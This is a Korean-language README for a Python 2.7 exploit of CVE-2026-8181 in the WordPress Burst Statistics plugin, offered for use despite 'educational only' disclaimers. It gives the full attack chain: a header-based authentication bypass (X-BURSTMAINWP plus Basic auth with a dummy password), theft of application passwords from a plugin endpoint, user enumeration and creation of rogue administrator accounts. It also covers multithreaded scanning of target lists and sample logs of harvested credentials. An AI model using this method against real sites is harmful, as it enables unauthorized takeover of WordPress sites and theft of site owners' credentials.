
CVE-2026-8181: Burst Statistics 인증 우회 → REST API 탈취 및 관리자 생성. Python 2.7. 교육용으로만 사용하십시오.
Python 2.7 익스플로잇으로, Burst Statistics 플러그인 취약점(CVE-2026-8181)을 통해 인증되지 않은 공격자가 REST API 인증을 우회하고, 애플리케이션 비밀번호를 획득하며, 취약한 WordPress 사이트에 새로운 관리자 사용자를 생성할 수 있습니다.
⚠️ 면책 조항
이 도구는 교육 및 승인된 보안 테스트 목적으로만 사용됩니다. 컴퓨터 시스템에 대한 무단 접근은 불법입니다. 자신이 소유하거나 명시적 테스트 허가를 받은 웹사이트에서만 사용하십시오. 추가 면책 조항은 Jenderal92의 표지에서 확인할 수 있습니다. 여기에서 확인하세요!!!
CVE-2026-8181은 WordPress용 Burst Statistics 플러그인(패치 이전 버전)에 영향을 미칩니다. 이 결함은 REST API 인증 메커니즘에 있으며, 공격자가 다음을 수행할 수 있습니다:
X-BURSTMAINWP 헤더를 전송하여 인증 우회/burst/v1/mainwp-auth 엔드포인트를 통해 애플리케이션 비밀번호 검색/, /wordpress, /wp)/wp-json/wp/v2/users 또는 작성자 ID 리디렉션을 통한 사용자 이름 열거res_login.txt – 간결한 파이프로 구분된 REST API 자격 증명 (파싱/임포트 용이)full_res_login.txt – 접근 확인 및 애플리케이션 비밀번호를 포함한 완전한 사람이 읽기 쉬운 보고서requests 라이브러리pip install requests
대상 목록 파일 준비 (한 줄에 하나의 도메인 또는 IP, http:///https:// 유무 상관 없음).
예시 targets.txt:
example.com
https://vulnerable-site.com
127.0.0.1/wordpress
익스플로잇 실행:
python2 CVE-2026-8181.py targets.txt
res_login.txt – REST API 자격 증명 (취약한 대상당 한 줄)full_res_login.txt – 상세 보고서| Argument | Description |
|---|---|
list.txt | 대상 URL을 포함한 파일 경로 |
============================================================
CVE-2026-8181 - Burst Statistics Auth Bypass Exploit
============================================================
[*] Total targets: 2
[*] Threads: 10
[*] Base paths: ['', '/wordpress', '/wp']
[*] Scanning: example.com
Trying path: /
Detected username: admin
[+] VULNERABLE! REST API bypass successful
[+] Application Password obtained!
[+] Username: admin
[+] App Password: xxxx xxxx xxxx
[+] Base64 Token: YWRtaW46eHh4eA==
[+] Access confirmed: WordPress settings
[+] Access confirmed: Installed plugins
[+] Access confirmed: Admin users
[+] Admin user created via REST API: wp_abc123
[+] Results saved to res_login.txt and full_res_login.txt
res_login.txt – 간결한 REST API 자격 증명각 줄은 다음 파이프로 구분된 형식을 따릅니다:
target|username|password|email|user_id
예:
http://example.com|wp_xyz789|AbC123xyz456|[email protected]|42
이 형식은 다음에 적합합니다:
cut, grep 또는 Excel로 빠르게 검사full_res_login.txt – 완전한 상세 보고서각 취약한 대상에 대해 스크립트는 사람이 읽기 쉬운 블록을 추가합니다:
============================================================
Target: http://example.com
============================================================
[+] Access Verification:
[+] WordPress settings
[+] Installed plugins
[+] Admin users
[+] REST API Credentials:
Username: wp_abc123
Password: random12char
Email: [email protected]
User ID: 42
URL: http://example.com/wp-admin/
Note: Use with X-BURSTMAINWP header
[+] Application Password:
Username: admin
App Password: xxxx xxxx xxxx
Base64 Token: YWRtaW46eHh4eA==
참고: 애플리케이션 비밀번호 엔드포인트를 사용할 수 없거나 토큰을 반환하지 않으면 해당 섹션에
FAILED가 표시됩니다.
http:// 접두사를 추가하고, 끝에 있는 슬래시를 제거합니다./, /wordpress, /wp를 WordPress 기본 디렉토리로 시도합니다./wp-json/wp/v2/users를 가져오거나 ?author=N 리디렉션을 사용합니다.X-BURSTMAINWP: 1 + 사용자 이름과 더미 비밀번호(CVE-2026-8181)로 Basic 인증을 전송합니다. 엔드포인트 /wp-json/wp/v2/users/me?context=edit가 200을 반환하면 사이트가 취약합니다./wp-json/burst/v1/mainwp-auth를 요청합니다./settings, /plugins, /users에 대한 접근을 확인합니다.POST /wp-json/wp/v2/users를 통해 새 관리자 계정을 생성합니다.res_login.txt에, 전체 세부 정보를 full_res_login.txt에 기록합니다.스크립트 내에서 다음 변수를 수정할 수 있습니다:
THREADS – 동시 스레드 수 (기본 10)BASE_PATHS – 확인할 추가 WordPress 하위 디렉토리requests 타임아웃 값이 프로젝트는 교육 목적으로만 제공됩니다. 사용에 따른 책임은 본인에게 있습니다.